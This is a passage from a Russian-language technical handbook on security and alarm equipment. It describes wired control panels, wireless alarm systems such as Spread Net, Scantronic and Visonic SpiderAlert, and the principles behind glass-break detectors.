> 60 паролей пользователей с многоуровневыми полномочиями;

> возможность подключения до 8 клавиатур;

> память на 400 событий;

> возможность подключения принтера;

> встроенный модем;

> программное обеспечение для дистанционного программирования и контроля состояния системы.

2-3-61.jpg

Рис. 2. 70. Применение панели DS7400Xi

Структурная схема системы охраны на основе приемно-контрольной охранно-пожарной панели DS7400Xi представлена на рисунке 2. 70.

Система не требует предварительного программирования и поддерживает все основные форматы передачи сообщений по телефонной линии. Информацию, содержащуюся в памяти панели, можно выводить в реальном масштабе времени на принтер или на персональный компьютер.

Рис. 2.70. Применение панели DS7400Xi

Изображение: 

2.3.7. Интегрированная охранная система "Росси".

2.3.7. Интегрированная охранная система «Росси»

Система «Росси» представляет собой модульную компьютерную систему охраны, включающую в себя: многоканальную систему видеонаблюдения, систему контроля охранных датчиков, систему ограничения доступа, систему удаленного видеоконтроля и управления.

Интегрированная охранная система «Росси» (рис. 2. 71) состоит из следующих составных частей:

«Росси-1» — единый центр управления;

«Росси-2» — охранная система стационарных объектов;

«Росси-3» — мобильная система охраны.

Система предназначена для охраны банков, складов, офисов, территорий вблизи домов, автомобилей и т. п. Система видеонаблюдения обеспечивает интеллектуальный алгоритм обнаружения движения, определяя тем самым новый уровень качества работы за счет уменьшения количества ложных тревог без ухудшения

2-3-71.jpg

Рис. 2. 71. Охранная система "Росси".

качества изображения. Возможность программирования параметров алгоритма работы позволяет системе эффективно функционировать в сложных условиях наружного наблюдения.

Адаптивное компьютерное управление поворотным устройством позволяет автоматически сопровождать движущиеся объекты, обеспечивая непрерывное отображение их на экране монитора и запись на видеомагнитофон без участия оператора.

Для ввода сигналов изображения с видеокамеры и их оцифровки применяются специальные платы ввода видеосигналов. Использование цифровой обработки телевизионных сигналов обеспечивает компрессию поступающих изображений с последующей передачей их по различным каналам связи, в том числе по стандартным телефонным каналам, радиоканалу, лазерному И К каналу.

Характеристики платы ввода изображения:

> три входа для подключения ТВ сигнала цветного (PAL) или черно-белого изображения;

> один выход для подключения ТВ монитора;

> разрешение изображения при выводе на экран монитора 512х512 точек (8 бит на точку);

> дополнительная память для наложения на изображение служебной информации (256х256 точек, 4 бита на точку).

Передача изображения осуществляется в формате 256х256 точек (8 бит на точку). Формат компрессии JPEG, качество восстановления 70%, время передачи менее 1 с при скорости 28800 бод.

Система «Росси» ведет постоянный контроль состояния охранных датчиков. Предварительное программирование режимов работы установленных датчиков позволяет автоматически коммутировать необходимые камеры на экран монитора или видеомагнитофон. Для коммутации ТВ камер используются видеомультиплексоры фирмы Dedicated Micros.

Плата обработки сигналов обеспечивает ввод в компьютер информации о состоянии 8 охранных датчиков и двух релейных выходов, формирующих сигналы контроля. Имеется программное обеспечение для управления контрольной панелью VISTA-501.

Интеллектуальное управление системой ограничения доступа позволяет жестко следить за проходом и перемещениями по охраняемой территории. Управление с компьютера даже простейшими системами ограничения доступа дает возможность создания журналов посещения на большое количество пользователей. Требования к конфигурации персонального компьютера приведены в табл. 2. 5.

Для централизованного видеоконтроля удаленных объектов возможно их объединение в единую глобальную систему с одним центром управления. Используя стандартные телефонные каналы связи, можно управлять несколькими системами из любой точки мира. Полная дистанционная настройка периферийных систем охраны с центрального пункта позволяет свести к минимуму обслуживающий персонал удаленных охраняемых объектов.

Система «Росси» является полностью совместимой со всеми стандартными черно-белыми и цветными системами охранного телевидения. Она достаточно просто включается в новые или уже существующие системы охраны, обеспечивая повышение их уровня безопасности.

Таблица 2. 5. Требования к конфигурации персонального компьютера

Процессор

i80486DX2-66 и лучше

ОЗУ

4Мбайт

Жесткий диск

не менее 240 Мбайт

Дисковод

3, 5"; 1, 44 Мбайт

Оперативная система

MS-DOS 5. 0 и выше

Порт связи

RS-232C (COM), LPT

Количество слотов ISA

3


Рис. 2.71. Охранная система "Росси".

Изображение: 

2.3.8. Звуковая охранная сигнализация "Ревун".

2. 3. 8. Звуковая охранная сигнализация «Ревун»

Звуковая охранная сигнализация «Ревуна предназначена для охраны стационарных объектов. Она оснащена встроенной сиреной мощностью 110 дБ, имеет автономное питание и обеспечивает три зоны охраны. Система позволяет использовать ИК детекторы, детекторы битого стекла, контактные датчики, пожарные датчики и др.

Основные технические характеристики сигнализации «Ревуна:

Количество зон охраны...................................................................... 3

Мощность встроенной сирены, дБ..................................................... 110

Встроенный аккумулятор, Ахч........................................................... 1, 6

Напряжение питания, В..................................................................... 12

Диапазон рабочих температур, С....................................... от -30 до+ 40

Габаритные размеры металлического корпуса, мм..................... 175х275х50

Масса не более, кг............................................................................ 2, 0

Структурная схема сигнализации "Ревун" представлена на рис. 2.72.

Сигнализация имеет три зоны охраны:

> зона 1 — зона с задержкой срабатывания на вход;

> зона 2 — зона мгновенного срабатывания (включает в себя ИК детекторы, детекторы битого стекла, оконную фольгу);

2-3-81.jpg

Рис. 2.72. Структурная схема охранной сигнализации «Ревун»

> зона 3 — зона круглосуточной охраны (включает в себя кнопки тревоги, пожарные датчики, линии Tamper установленного оборудования: видеокамер, охранных датчиков, выносных сирен).

Питание системы осуществляется от встроенной аккумуляторной батареи (12 В/1, 6 Ахч), которая автоматически подзаряжается от сети переменного тока. Система имеет вход для подключения выносного выключателя блока. Кроме того, система имеет выходы:

> для подключения внешних сирен, стробовспышек;

> для подключения внешних устройств (ток нагрузки до 1 А);

> для подключения выносного охранного маячка;

> для управления автодозвонщиком;

> «+ 12 В/1, 6 Ахч» для охранных датчиков и другого оборудования, требующего бесперебойного питания. Блок управления системы позволяет осуществлять следующие регулировки:

времени задержки на вход, с.......................................................... 1 — 60

времени звучания сирены при срабатывании зоны 1, мин................... 1—5

времени звучания сирены при срабатывании зоны 2, мин................... 1—5

Интервалы задержек по зонам устанавливаются подстроечными резисторами R1, R2, R3 соответственно, расположенными на плате управления блока.

Рис. 2.72. Структурная схема охранной сигнализации «Ревун»

Изображение: 

2.3.9. Прибор приемно-контрольный охранно-пожарный "Аккорд".

2. 3. 9. Прибор приемно-контрольный охранно-пожарный «Аккорд»

Прибор предназначен для автономной или централизованной охраны квартир, коттеджей, офисов, магазинов, складов, пунктов обмена валюты и т. п. Он обеспечивает контроль четырех шлейфов сигнализаций (ШС) как в автономном режиме с подачей звукового и светового сигнала, так и с передачей тревожного извещения на пульт централизованного наблюдения (ПЦН) по телефонной линии. Пример использования прибора показан на рис. 2. 73. Прибор контролирует 4 шлейфа сигнализации:

> охранный с задержкой включения встроенной сирены (тревога на пульт передается мгновенно при нарушении любого шлейфа);

> охранный (возможно питание от шлейфа извещателя «Волна-5»);

> тревожный (кнопка тревоги) с 15-минутной памятью состояния тревоги;

> пожарный (возможно питание от шлейфа до 5 дымовых датчиков).

Управление режимом работы прибора осуществляется либо переключателем на приборе, либо с выносного шифроустройства четырехзначным кодом (рис. 2. 74). Режимы работы прибора:

> режим частичной охраны — контроль одного (пожарный ШС4) или двух (тревожный ШСЗ и пожарный ШС4) шлейфов;

> режим полной охраны — контроль всех четырех шлейфов;

> режим входа/выхода.

2-3-91.jpg

Рис. 2.73. Структурная схема использования прибора «Аккорд»

В этих режимах состояние тревоги сопровождается выдачей тревожного извещения при нарушении ШС или вскрытии прибора путем размыкания контактов реле или передачей модулированных ВЧ сигналов по системе "Атлас-3", "Атлас-6"; включением встроенной (12 В) или внешней (220 В) сирен и внешнего светового оповещателя (лампы 220 В или 24 В).

2-3-92.jpg

Рис. 2.74 Прибор «Аккорд»

При входе на объект прибор обеспечивает задержку на включение оповещателей, а при выходе — блокировку сигналов от датчиков на время, необходимое для-выхода и закрывания двери.

Кроме шлейфов сигнализации ШСЗ, ШС4, описанных выше, в приборе используются еще два шлейфа:

> ШС1 — шлейф охранной сигнализации с задержкой включения звуковых и световых оповещателей;

> ШС2 — шлейф охранной или пожарной сигнализации с возможностью

питания извещателей по шлейфу (постоянным напряжением 24 В). Существует несколько вариантов работы прибора. "Аккорд":

> постановка на охрану с закрытой дверью с ограничением времени выхода (10-50 с);

> постановка на охрану с открытой дверью с неограниченным временем выхода (до закрывания двери);

> при снятии с охраны после нарушения ШС1 время до включения оповещателей ограничено (10—50 с).

Выбор вариантов происходит автоматически: если при нажатии кнопки «Охрана» шлейф ШС1 разомкнут (дверь открыта), то включение режима охраны произойдет через 10 с после восстановления ШС1 (закрывание двери). Если ШС1 замкнут (дверью закрыта), то режим охраны включится через 10—50 с.

Прибор имеет автоматически подзаряжаемый аккумулятор, который обеспечивает автономную работу в течение 12 час. В комплект поставки входит блок выносных светодиодных индикаторов состояния каждого шлейфа. Возможно подключение внешней сирены и сигнальной лампы.

В конструкции прибора учтен многолетний опыт специалистов вневедомственной охраны, поэтому функции прибора легко адаптируются к условиям конкретного объекта.

Прибор имеет габаритные размеры 300х246х82 мм и сохраняет работоспособность при температуре -30...+ 50°С.

Рис. 2.73. Структурная схема использования прибора «Аккорд»

Изображение: 

Рис. 2.74 Прибор «Аккорд»

Изображение: 

2.4. Беспроводные системы безопасности и сигнализации.

2. 4. Беспроводные системы безопасности и сигнализации

Беспроводные радиосистемы безопасности и сигнализации позволяют организовать многоканальные системы ограничения доступа, управления и слежения за разнообразными объектами. Эти системы широко используются для охраны периметров и отдельно стоящих удаленных объектов. Применение современных технологий и методов обработки сигналов делает беспроводные системы конкурентноспособными по сравнению с обычными проводными системами, а иногда и единственно возможным вариантом организации охраны.

2.4.1. Беспроводная система сигнализации Spread Net.

2. 4. 1. Беспроводная система сигнализации Spread Net

Система Spread Net производства компании С&К Systems относится к системам высокой помехозащищенности. В ней использована технология распределения спектра, применяемая Национальным управлением по аэронавтике США (НАСА). В системе осуществляется передача информации шумоподобным сигналом, состоящим из 126 элементов. Особенности системы:

> простота установки;

> применение специальных антенн для улучшения приема сигналов;

> возможность использования до 16 зон охраны;

> индикация сигнала тревоги и неисправности для каждой зоны;

> автоматическое включение самоконтроля;

> автоматический контроль радиоканала для выбора рабочей частоты;

> автоматический контроль радиоканала на предмет совместимости с дру гой системой этого типа;

> устойчивость к шумам и радиопомехам. Основные технические характеристики системы Spread Net: Рабочий диапазон частот, МГц .................................................. 902—928

Дальность действия в зоне прямой видимости, м ............................... 2000

Мощность радиоизлучателя, мВт....................................................... 100

Контроль работоспособности с интервалом, мин ......................... от 0 до 5

Диапазон рабочих температур, С ............................................от 0 до 60

Питание датчиков:

количество батарей, шт ................................................................... 2

тип батарей ........................................................................литиевые

напряжение, В.............................................................................3,6

В состав системы Spread Net входит следующее оборудование (рис. 2.85):

передатчик SN900-PROG, приемник SN912-RCV, интерфейс SN913-I/0 (для

2-4-11.jpg

сопряжения с контрольными панелями), дверной контакт SN930-DOOR (он же универсальный передатчик), пассивный инфракрасный детектор SN940-PIR, детектор битого стекла SN950-GLASS, кнопки подачи сигнала тревоги SN970-PANIC, SN971-HOLDUP и SN960-PENDANT, комбинированный детектор SN935-DT, детектор контрольной банкноты SN973-MONEY, дымовой пожарный детектор SN980-SMOKE и тепловой извещатель SN981-HEAT.

Ориентировочная стоимость минимальной конфигурации системы на 16 зон охраны составляет 900 USD.

Рассматриваемую систему SpreadNet можно без преувеличения отнести к устройствам, уникальным для гражданского применения. До настоящего времени системы такого класса использовались только для военных целей, специальной и космической связи. Многолетние разработки С&К System, Inc. позволили реализовать беспроводную систему охранной сигнализации, имеющую превосходные параметры и возможности при вполне приемлемых ценах.

В чем же заключается уникальность этой системы? Прежде всего, в сигнале, используемом для передачи информации. Это так называемый шумоподобный сигнал, состоящий из 126 элементов, со спектром, распределенным в широкой полосе частот. Со спектральной точки зрения, такой сигнал выглядит, как шум. Поэтому крайне сложно не только зафиксировать его параметры, используя соответствующую аппаратуру, но даже обнаружить факт работы системы. При ширине рабочей полосы частот 2, 4 МГц и выходной мощности передатчиков 100 мВт средняя мощность на полосу частот 10 кГц (как в обычной узкополосной системе) составляет 0, 417 мВт. Длительность информационного сигнала равна 7, 6 мс.

Важнейшим требованием к любой системе охранной сигнализации является контроль канала связи. Требование контроля канала во много раз важнее и сложнее реализуется в системах, использующих радиоканал. Это обусловлено тем, что реально в радиосистемах постоянный контроль канала связи неосуществим, так как для этого требуется отдельный частотный канал для каждого передатчика. При разумных требованиях к таким системам контроль канала обычно осуществляется с той или иной периодичностью. Система SpreadNet позволяет осуществить передачу тестовых сигналов контроля передатчиков с интервалом от 30 с до 5 мин.

Структура используемого сигнала обеспечивает также высокую помехоустойчивость системы. Для подавления сигнала необходимо создать помеху в широкой полосе частот (более половины ширины спектра), что достаточно сложно реализовать технически. Но даже при постановке такой помехи система зафиксирует тревогу, поскольку для блокирования Spread Net необходимо решить противоречивую задачу: с одной стороны, подавить сигнал тревоги, а с другой — сохранить сигнал контроля передатчиков в той же полосе частот и с теми же параметрами, что практически нереально.

Информативность сообщений от элементов системы (передатчиков) также весьма важный показатель. Система SpreadNet дает возможность регистрировать тревогу, вскрытие извещателей, разряд батарей, отсутствие сигнала контроля и нарушение линии связи приемник-интерфейс (контрольная панель).

Если при установке проводных систем охранно-пожарной сигнализации не возникает проблем с взаимным влиянием одной системы на другую, то в беспроводных системах взаимные помехи могут стать причиной сбоев в работе. Система SpreadNet позволяет осуществить автоматический контроль эфира на наличие других радиосистем, создающих взаимные помехи, и соответствующим образом изменить параметры функционирования системы. Также производится автоматический выбор параметров сигнала, обеспечивающих максимальное отношение сигнал/шум в месте конкретной установки.

Одна из чрезвычайно полезных особенностей системы SpreadNet — способность измерить реальное отношение сигнал/шум для каждого передатчика объективно, в цифрах, в децибелах. Это позволяет, во-первых, снять точную карту распределения качества приема сигнала из различных частей объекта и, во-вторых, выбрать оптимальное место расположения каждого извещателя с точки зрения максимума отношения сигнал/шум, перемещая его на некоторое расстояние и измеряя при этом соотношение уровней сигнала и шума. Ресурс источников питания беспроводных систем, определяющих продолжительность функционирования передатчиков до замены источников питания, зависит от многих условий. В системе SpreadNet продолжительность использования источников питания достаточно велика благодаря ряду параметров и конструктивных особенностей устройств. Например, используемый диапазон частот 900 МГц позволяет реализовать оптимальные четвертьволновые антенны внутри корпуса извещателей без увеличения их размера. Это, а также малая длительность передаваемого сигнала, позволяют уменьшить потребление энергии и увеличить срок службы источников питания в зависимости от режима работы до 5 лет.

Рис. 2.4 Беспроводная система сигнализации Spread Net - состав системы

Изображение: 

2.4.2. Радиосистемы безопасности фирмы Scantronic.

2. 4. 2. Радиосистемы безопасности фирмы Scantronic

Фирма Scantronic предлагает широкий спектр приемников и передатчиков, из которых легко собрать необходимое оборудование для конкретного применения. Все изделия изготовлены с использованием современной полупроводниковой и микропроцессорной технологий в условиях строгого контроля за сборкой и качеством, чем обеспечивается их высокая надежность.

Все радиосистемы работают на частоте профессиональных служб безопасности 173, 22511 МГц в узкой полосе частот. Радиосистемы Scantronic — это семейство частотно-модулированных передатчиков и гетеродинных приемников с двойным преобразованием частоты, для которых характерным является применение модулей памяти и батарей с большим сроком службы. Эти высокоселективные радиосистемы, игнорирующие любые нежелательные сигналы, способны более надежно декодировать принимаемые сообщения, чем другие системы. Все элементы радиосистем имеют современный дизайн (рис. 2. 86)

В качестве примера кратко рассмотрим особенности систем безопасности Scantronic серии 4600.

2-4-21.jpg

Рис.2.86 Система безопасности Scantronic

Системы серии 4600

Особенности систем:

> 8-зоновая панель управления со звонком;

> все зоны с программным управлением;

> дополнительная возможность программирования зон по радиоканалу;

> запоминание состояния тревоги по зонам;

> защищенность клавиатуры от несанкционированного использования;

> батареи емкостью 2, 1 Ахч обеспечивают непрерывную работу системы в течение 15 часов;

> уникальная программа обнаружения ошибок (или неисправностей);

> имеют полный набор охранных датчиков.

Системы включают в свой состав полный набор передатчиков и приемников для любых применений, 5 типов передатчиков «Тревожная кнопка», включая «наклонный» блок переключения, двухканальный приемник, совместимый со всеми панелями управления, восьмиканальный приемник (с возможностью расширения до 64 каналов), питаемый от магистрали или от источника+ 12 В, программируемый многофункциональный передатчик 4603. С помощью стандартного передатчика КТ4602 или подвесного блока 4601 аппаратура систем позволяет контролировать площадь в радиусе до 900 м.

Система Multiscan 4660

Особенности системы:

> изготовлена по современной технологии;

> передатчик на 512 дуплексных каналов;

> широкий спектр применения (вызов обслуживающего персонала, безопасность персонала или диспетчерское управление);

> совместима с другими моделями серии 4600;

> сообщения выдаются на одном из семи языков;

> 2 типа блоков дистанционного дисплея;

> 32-х символьный ЖК дисплей, используемый в качестве дистанционного.

Имеется возможность подключения с помощью обычной трехпроводной шины до 7 дистанционных дисплеев. Система совместима с большинством систем пейджинга, имеет выход на принтер и интерфейс RS-232. Multiscan 4660 совместима с моделями 4600 и Viper.

Широкий спектр радиоборудования позволяет реализовать практически любую конфигурацию системы для конкретного применения, например: защита удаленного пользователя, работающего без помощника или оставшегося без него (детектор наклона определит падение человека на землю, а радиопередатчик сообщит об этом в центр управления); управление на производстве (системы управления механизмами); коммерческая безопасность (радиосистема способна защитить каждую картину в музее); использование в больнице (для вызова персонала).

Разновидности моделей передатчиков, приемников и антенн радиосистем безопасности фирмы Scantronic приведены в табл. 2. 6.

Таблица 2. 6. Разновидности радиосистем фирмы Scantronic

Наименование изделия

Назначение

Передатчики

4601-50

Подвесной передатчик

4601-55

Подвесной передатчик с короткой антенной

4602-55

Переносной передатчик, работающий на большом расстоянии

4604-60

Универсальный передатчик с программным управлением

4603-55

Контактный передатчик с постоянным магнитом

4605-55

Триггер/Т для панели 4600, двухканальный передатчик

4606-55

Аналог 4602 с «наклонным» переключателем и звуковым сигналом

4608

Пассивный И передатчик непрерывного действия

4609

Четырехканальный передатчик, работающий на большом расстоянии с питанием+ 12 В

Приемники

4600

8-зоновая панель управления

4612

Двухканальный приемник

4613

Переключатель напряжения 240 В мощностью 1, 5 кВт

4618-50

8-канальный блок с программным управлением

4618-55

Встроенная плата реле для модели 4618-50/60



Окончание таблицы 2. 6

Наименование изделия

Назначение

Приемники

4618-60

Модель 4618-50 на 240 В

4619-50

8-канальный расширительный блок для модели 4618-50/60

4660

Мультисканирующий 512-зоновыйриемник

4670-00

Передатчик вызова обслуживающего персонала

4670-01

Передатчик вызова обслуживающего персонала

4670-02

Передатчик вызова обслуживающего персонала

4661

Аналог модели 4660

4662

Терминал оператора для модели 4660

Антенны

4594

Четвертьволновая штыревая антенна BNS

4595

4-х элементная направленная антенна YAGI

4597

Полуволновый диполь

4598

Четвертьволновая спиральная антенна

4599

Четвертьволновая спиральная антенна


Рис.2.86 Система безопасности Scantronic

Изображение: 

2.4.3. Системы централизованного контроля фирмы Visonic, Ltd.

2.4.3. Системы централизованного контроля фирмы Visonic, Ltd.

Система SpiderAlert

Система SpiderAlert фирмы Visonic, Ltd. (Израиль) по своим функциональным возможностям занимает промежуточное положение между контрольными панелями и мощными системами централизованного контроля. Ядром системы является центральный блок управления, который по стандартному последовательному интерфейсу RS-232 связан с персональным компьютером. Центральный блок принимает информацию от многочисленных (до 255) адресных приемников по двухпроводной шине данных. В качестве приемников используются радиоприемники сигналов от микромощных радиопередатчиков, приемники инфракрасных сигналов и приемники контактных событий. Источники информации в системе — различные детекторы или кнопки тревоги. Они имеют свой персональный код от 1 до 4087,

Особенности системы:

> свободное конфигурирование системы под конкретный объект с учетом постановки на охрану и снятия с охраны отдельных частей объекта как с центрального пункта, так и со стороны «хозяев» подразделений. А также постановка/снятие охраны владельцем объекта, а с центрального пункта — только постановка;

> произвольное назначение количества охраняемых зон, их функций и статуса;

> переключение системы в различные режимы работы (дневной, ночной, охраны периметра);

> отображение событий на графическом плане охраняемого объекта с использованием узнаваемых графических образов источников (типов датчиков) и приемников тревожной информации;

> переназначение функций выбранных передатчиков-брелков с функции «Тревога» на функцию «Я жив»;

> реализация функции автоматического контроля за работой сторожа, с фиксацией его реальной траектории движения по объекту;

> ведение журнала событий и журнала постановки/снятия охраны объектов;

> управление внешними устройствами (системами пожаротушения, оповещения, блокировки/разблокировки) через блок, содержащий 8 мощных электромагнитных реле.

В состав системы Spider входят около двух десятков различных приборов, начиная от источника электропитания и заканчивая разнообразными датчиками событий. Общая длина шины данных системы может достигать 3—5 километров. Для увеличения эффективной длины шины используется стандартный элемент системы — ретранслятор шины.

При первоначальном включении системы каждый приемник информации посылает в центральный блок системы сообщение о своем наличии в системе. Это приводит к его регистрации в центральном блоке. В дальнейшем, с периодом 90 с, каждый приемник подтверждает свое присутствие в системе. При отсутствии подряд двух таких подтверждений центральный блок формирует тревожное сообщение об исчезновении зарегистрированного приемника. Соответствующее сообщение появится и при коротком замыкании шины данных. Это позволяет контролировать возможные злонамеренные действия по нарушению работы системы.

В процессе работы системы каждое сообщение, полученное от источника информации, фиксируется в соответствующем приемнике. После этого приемник передает полученное сообщение на центральный блок системы. В сообщении указывается как номер приемника информации (адрес), так и идентификационный номер источника сообщения. Центральный блок системы подтверждает получение сообщения, отправляя в приемник специальную кодовую посылку. Если ответ от центрального блока не получен, приемник периодически повторяет попытку передачи сообщения о тревоге до получения подтверждения.

Двойное кодирование источников и приемников тревожной информации, а также эффективное сочетание проводного и беспроводного способов передачи информации позволяет реализовать целый ряд новых функций. Так, при появлении сигнала от кнопки тревоги по ее индивидуальному коду можно оперативно выявить имя владельца, а по адресу приемника, принявшего сигнал, можно с точностью до нескольких метров определить местонахождение потерпевшего. Общее число кодируемых источников тревожной информации в системе SpiderAlert превышает 4000 единиц. Такие потенциальные ресурсы системы позволяют строить на ее основе системы контроля для крупных зданий, офисов и организаций с возможностью свободной настройки под конкретную задачу:

будь то охрана многоэтажного дома или протяженной торговой площадки с общим числом охраняемых объектов более 300. В то же время низкая стоимость ее элементов дает возможность применять ее для задач охранной сигнализации коттеджей, группы квартир или небольших предприятий.

Система может быть реализована (рис. 2. 87) как в чисто проводном варианте, так и с использованием радиоканальных (рис. 2. 88) компонентов (кнопок тревоги, детекторов). Применение радиодетекторов и универсальных радиопередатчиков существенно снижает затраты на монтаж системы. Расстояние от передатчика до ближайшего приемника составляет 30—100 м, а при использовании простых направленных антенн может быть увеличено до 1—2 км.

Центральный блок управления способен работать автономно, без подключения к компьютеру. При возникновении события в системе на миниатюрный индикатор блока управления на несколько секунд выводится сообщение о но-

2-4-31.jpg

Рис. 2. 87. Структура системы SpiderAlert

2-4-32.jpg

Рис. 2. 88. Радиооборудование фирмы Visonic Ltd.

мере приемника тревожного события и код источника события. Одновременно с этим имеется возможность оповещать службу охраны посредством управления аудиовизуальными устройствами, подключенными к блоку. Однако в полной мере функциональные возможности системы раскрываются при эффективной поддержке со стороны программного обеспечения персонального компьютера.

Открытый для пользователя протокол обмена между компьютером и центральным блоком системы дает возможность создания заказных или индивидуальных систем мониторинга с предельно адаптированным под конкретную задачу интерфейсом «пользователь-система». Непрерывное протоколирование всех событий в системе дает возможность проследить характер развития происшествия. Срабатывание всех компонентов системы точно привязано ко времени и фиксируется в памяти компьютера в виде специального журнала событий. Систему мониторинга SpiderAlert можно рассматривать и как универсальную, контрольную панель с адресными датчиками, которая с помощью модулей сопряжения способна эффективно взаимодействовать с любым традиционным охранным оборудованием. Функциональные возможности и свойства системы определяются как аппаратурой, так и программным обеспечением.

Система реализована на IBM PC-совместимом компьютере (i80286 и выше, видеоадаптер стандарта EGA или VGA, ОЗУ емкостью 1 Мбайт, жесткий диск объемом 80 Мбайт и более, порты СОМ1, COM2) в среде DOS и предусматривает взаимодействие с операторами нескольких уровней подготовленности и доступа. Один уровень, «охранника», требует минимальной подготовки и подразумевает использование мыши и нескольких клавиш клавиатуры компьютера. Другой уровень — «хозяина», обеспечивает санкционированный доступ к журналам системы и к смене режимов работы системы. Третий уровень — «настройщика», дает возможность конфигурирования системы со свободным включением и отключением любого элемента системы и назначения его статуса.

Система RC-4000

Многофункциональные системы фирмы Visonic, Ltd., обладая развитыми средствами радио- и телефонной связи, способны собирать и обрабатывать самую различную информацию, связанную с безопасностью: по охране объектов, пожарной безопасности, контролю за чрезвычайными ситуациями, оперативному вызову врачей на объекты, лишенные иных средств связи. В ряде регионов России охранные структуры остановили свой выбор на системе централизованного контроля RC-4000 (рис. 2. 89).

Все компоненты этой системы: детекторы, контрольные панели, средства радио- и телефонной связи, а также Центральная станция прошли сертификацию в органах МВД и Минсвязи России. Система централизованного контроля RC-4000 — это разветвленная структура с центральным пультом наблюдения, с набором технических средств для передачи информации от удаленного охраняемого объекта и комплексом устройств обнаружения тревожных извещений на самом объекте. Аппаратура центрального пульта обеспечивает непрерывный текущий контроль изменений состояния объекта, оперативное оповещение охранного персонала о месте и характере тревоги, автоматическое ведение протокола событий в системе.

Система централизованного контроля RC-4000 выгодно отличается от аналогичных устройств других фирм умеренной ценой и развитым абонентским оборудованием. Информация от охраняемых объектов может поступать на центральную станцию по телефонным линиям и радиоканалу. Минимальная кон-

2-4-33.jpg

Рис. 2. 89. Система централизованного контроля RC-4000

фигурация возможна при использовании только одного телефонного канала связи с аппаратурой охраняемого объекта. Максимальное количество телефонных линий, с которыми способна работать станция, — 6. При использовании радиоканала в состав оборудования дополнительно включаются радиоприемник и контроллер радиоканала. Возможно использование станции исключительно в радиоварианте. Максимальная конфигурация станции — 6 телефонных и один радиоканал. При максимальном количестве каналов связи станция способна эффективно взаимодействовать с тысячами абонентов.

Мощное русифицированное программное обеспечение позволяет реализовать самые разнообразные функции контроля, протоколирования, фильтрации и интерпретации событий. На экран компьютера выводятся сообщения на русском языке типа «Взлом» или «Нападение» с последующим выводом адреса и имени абонента, а также перечня действий оператора, рекомендованных в качестве целесообразных при этой тревоге и именно у этого абонента.

Протокол связи станции RC-4000 с персональным компьютером является открытым для пользователя. Это означает, что несложный способ кодирования сообщений, которыми обмениваются станция и компьютер, не засекречен, а напротив, четко описан в руководстве пользователя станции. Это дает возможность создавать свои версии программного обеспечения, способные отражать такие потребности и такую специфику объектов, которые часто невозможно предугадать в универсальной программе.

Удаленность абонента от радиоприемной антенны Центральной станции может составлять 15—25 км. При возникновении проблем с передачей по радиоканалу в местности со сложным рельефом возможно использование специальных ретрансляторов типа REP-130. Такой ретранслятор содержит модули радиоприемника и радиопередатчика и специальный контроллер управления процессом ретрансляции.

Важным свойством системы на базе RC-4000 является ее развиваемость. Система может работать, когда имеется Центральная станция и хотя бы один абонентский коммуникатор. Программное обеспечение Центральной станции позволяет по мере развития системы добавлять новых абонентов, причем у каждого из них может быть установлена любая комбинация объектового оборудования.

Рис. 2.87. Структура системы SpiderAlert

Изображение: 

Рис. 2.88. Радиооборудование фирмы Visonic Ltd.

Изображение: 

Рис. 2.89. Система централизованного контроля RC-4000

Изображение: 

3. Глава 3. ДАТЧИКИ И ДЕТЕКТОРЫ ОХРАННЫХ СИСТЕМ.

ГЛАВА 3. ДАТЧИКИ И ДЕТЕКТОРЫ ОХРАННЫХ СИСТЕМ.

Уровень надежности любой охранной системы или комплекса и их работа в целом зависят от того, какие датчики и детекторы в них использованы, где они размещены на охраняемой территории.

Как уже отмечалось (см. раздел 1.2.2), под датчиками будем понимать извещатели, преобразующие физические величины и характеристики (например, тепло, свет, звук и т.п.) в электрический сигнал. Детекторами же будем называть извещатели, включающие в свой состав датчики, схему обработки сигналов и схему принятия решения.

Существуют различные типы датчиков. Издавна известны электроконтактные датчики, работающие на размыкание или замыкание контактов, датчики, выполненные из тонкого провода или фольги, рвущихся при механическом воздействии на них.

В современных системах охраны все большее предпочтение отдается бесконтактным датчикам и детекторам. К ним относятся пассивные и активные детекторы движения на ИК лучах, радиоволновые детекторы, детекторы вибрации и битого стекла, ультразвуковые, магнитоконтактные и фотоэлектрические датчики. Современные датчики и детекторы выполняются на основе последних достижений науки и техники. Они имеют не только высокие технические характеристики, но и прекрасный дизайн.

Детекторы движения позволяют регистрировать возникновение движения на охраняемом объекте. Существует несколько их разновидностей, различающихся по принципу регистрации движения: ультразвуковые детекторы, пассивные и активные детекторы с инфракрасным датчиком, детекторы с радиоволновым датчиком, а также их комбинации.

Ультразвуковые детекторы имеют довольно высокую чувствительность. Они излучают и принимают отраженный ультразвуковой сигнал и позволяют регистрировать даже незначительный воздушный поток. В связи с этим возникает проблема помехоустойчивости — любое незначительное движение, сквозняк приводят к срабатыванию датчика и ложной тревоге.

В настоящее время широко используются детекторы движения на основе ИК датчиков. Они срабатывают при попадании движущегося объекта, излучающего тепло (например, человека), в зону чувствительности датчика. ИК детекторы движения обеспечивают надежную охрану большой площади, имеют современный дизайн, который хорошо вписывается в интерьер квартиры или офиса.

В данной главе рассмотрены наиболее популярные и надежные типы датчиков и детекторов, приведены их технические характеристики и особенности применения.

3. 4. Детекторы битого стекла, ультразвуковые и вибродатчики.

3.4. Детекторы битого стекла, ультразвуковые и вибродатчики

Кроме описанных выше детекторов, в охранных системах используются и другие типы датчиков. К ним относятся детекторы битого стекла, ультразвуковые датчики, вибродатчики и т. п.

Задача обнаружения разрушения стекла может решаться с использованием различных физических принципов. К основным из них можно отнести следующие:

1. Регистрация механических нарушений элементов извещателя. В этом случае используются электроконтактные датчики из фольги или проводник из специального армированного стекла. Механическое разрушение целостности проводника при разрушении стекла фиксируется схемой обработки.

2. Использование инерционных свойств. В этом случае извещатель имеет два элемента: один жестко закрепляется на поверхности стекла, другой — подвижный. При механических колебаниях стекла контакт между этими элементами нарушается, что и фиксируется схемой обработки.

3. Использование пьезоэлектрического эффекта. В этом случае извещатели могут быть как пассивными, так и активными. В пассивном варианте пьезодатчик размещается на поверхности стекла. Он преобразует механические колебания стекла в электрический сигнал, который обрабатывается соответствующей схемой. Такие детекторы имеют низкую помехозащищенность и не позволяют контролировать работоспособность пьезодатчиков. Лучшие характеристики имеют активные извещатели, состоящие из передатчика и приемника акустических колебаний. Поскольку частота колебаний, излучаемых передатчиком, заранее известна, это позволяет в приемнике выделять именно ее, что повышает помехоустойчивость системы. Кроме того, любые нарушения контакта со стеклом передатчика или приемника будут зарегистрированы схемой обработки.

